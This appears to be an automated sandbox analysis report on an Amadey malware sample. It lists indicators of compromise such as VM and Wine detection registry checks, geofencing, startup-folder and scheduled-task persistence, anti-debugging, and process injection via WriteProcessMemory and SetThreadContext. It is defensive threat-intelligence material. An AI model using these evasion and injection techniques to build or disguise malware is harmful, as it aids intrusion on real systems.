amadey | 3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77

Virtualization/Sandbox Evasion

Processes:

axplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 44 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

axplons.exe3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

axplons.exe3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	axplons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Drops startup file 1 IoCs

Processes:

Kaxhwswfup.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

Executes dropped EXE 24 IoCs

Processes:

axplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeKaxhwswfup.exeaxplons.exe$77f4daf3$77db5b93axplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

pid	Process
1528	axplons.exe
2372	axplons.exe
5020	axplons.exe
2616	axplons.exe
1700	axplons.exe
208	axplons.exe
1208	axplons.exe
1504	axplons.exe
3400	axplons.exe
2544	axplons.exe
4416	axplons.exe
3944	axplons.exe
1172	axplons.exe
1160	Kaxhwswfup.exe
4984	axplons.exe
2540	$77f4daf3
636	$77db5b93
3312	axplons.exe
5004	axplons.exe
1180	axplons.exe
3068	axplons.exe
4600	axplons.exe
3940	axplons.exe
3776	axplons.exe

Identifies Wine through registry keys 2 TTPs 22 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

axplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine	axplons.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEsvchost.exe

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs

Processes:

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exeaxplons.exe

pid	Process
1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
1528	axplons.exe
2372	axplons.exe
5020	axplons.exe
2616	axplons.exe
1700	axplons.exe
208	axplons.exe
1208	axplons.exe
1504	axplons.exe
3400	axplons.exe
2544	axplons.exe
4416	axplons.exe
3944	axplons.exe
1172	axplons.exe
4984	axplons.exe
3312	axplons.exe
5004	axplons.exe
1180	axplons.exe
3068	axplons.exe
4600	axplons.exe
3940	axplons.exe
3776	axplons.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Kaxhwswfup.exepowershell.EXE

description	pid	Process	procid_target
PID 1160 set thread context of 2540	1160	Kaxhwswfup.exe	105
PID 1376 set thread context of 572	1376	powershell.EXE	108
PID 1160 set thread context of 636	1160	Kaxhwswfup.exe	109

Drops file in Windows directory 1 IoCs

Processes:

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
468	636	WerFault.exe	109

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WerFault.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 53 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	Process
1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe
1528	axplons.exe
1528	axplons.exe
2372	axplons.exe
2372	axplons.exe
5020	axplons.exe
5020	axplons.exe
2616	axplons.exe
2616	axplons.exe
1700	axplons.exe
1700	axplons.exe
208	axplons.exe
208	axplons.exe
1208	axplons.exe
1208	axplons.exe
1504	axplons.exe
1504	axplons.exe
3400	axplons.exe
3400	axplons.exe
2544	axplons.exe
2544	axplons.exe
4416	axplons.exe
4416	axplons.exe
3944	axplons.exe
3944	axplons.exe
1172	axplons.exe
1172	axplons.exe
4984	axplons.exe
4984	axplons.exe
1376	powershell.EXE
1376	powershell.EXE
1376	powershell.EXE
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
572	dllhost.exe
1160	Kaxhwswfup.exe
572	dllhost.exe
572	dllhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

Kaxhwswfup.exepowershell.EXEdllhost.exedwm.exeWerFault.exeExplorer.EXE

description	pid	Process
Token: SeDebugPrivilege	1160	Kaxhwswfup.exe
Token: SeDebugPrivilege	1376	powershell.EXE
Token: SeDebugPrivilege	1376	powershell.EXE
Token: SeDebugPrivilege	572	dllhost.exe
Token: SeDebugPrivilege	1160	Kaxhwswfup.exe
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe
Token: SeRestorePrivilege	468	WerFault.exe
Token: SeBackupPrivilege	468	WerFault.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe
Token: SeShutdownPrivilege	3412	Explorer.EXE
Token: SeCreatePagefilePrivilege	3412	Explorer.EXE
Token: SeShutdownPrivilege	384	dwm.exe
Token: SeCreatePagefilePrivilege	384	dwm.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

pid	Process
1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exeaxplons.exeKaxhwswfup.exepowershell.EXEdllhost.exe

description	pid	Process	procid_target
PID 1504 wrote to memory of 1528	1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	85
PID 1504 wrote to memory of 1528	1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	85
PID 1504 wrote to memory of 1528	1504	3ed263e2d66c3a0dcace52a0755ce7eae5f72e352190286c9e5151e5bf5d0d77.exe	85
PID 1528 wrote to memory of 1160	1528	axplons.exe	103
PID 1528 wrote to memory of 1160	1528	axplons.exe	103
PID 1528 wrote to memory of 1160	1528	axplons.exe	103
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1160 wrote to memory of 2540	1160	Kaxhwswfup.exe	105
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 1376 wrote to memory of 572	1376	powershell.EXE	108
PID 572 wrote to memory of 628	572	dllhost.exe	5
PID 572 wrote to memory of 680	572	dllhost.exe	7
PID 572 wrote to memory of 964	572	dllhost.exe	12
PID 572 wrote to memory of 384	572	dllhost.exe	13
PID 572 wrote to memory of 1048	572	dllhost.exe	15
PID 572 wrote to memory of 1072	572	dllhost.exe	17
PID 572 wrote to memory of 1080	572	dllhost.exe	18
PID 572 wrote to memory of 1184	572	dllhost.exe	19
PID 572 wrote to memory of 1244	572	dllhost.exe	20
PID 572 wrote to memory of 1252	572	dllhost.exe	21
PID 572 wrote to memory of 1380	572	dllhost.exe	22
PID 572 wrote to memory of 1400	572	dllhost.exe	23
PID 572 wrote to memory of 1432	572	dllhost.exe	24
PID 572 wrote to memory of 1480	572	dllhost.exe	25
PID 572 wrote to memory of 1520	572	dllhost.exe	26
PID 572 wrote to memory of 1580	572	dllhost.exe	27
PID 572 wrote to memory of 1656	572	dllhost.exe	28
PID 572 wrote to memory of 1716	572	dllhost.exe	29
PID 572 wrote to memory of 1756	572	dllhost.exe	30
PID 572 wrote to memory of 1800	572	dllhost.exe	31
PID 572 wrote to memory of 1852	572	dllhost.exe	32
PID 572 wrote to memory of 1980	572	dllhost.exe	33
PID 572 wrote to memory of 1988	572	dllhost.exe	34
PID 572 wrote to memory of 2000	572	dllhost.exe	35
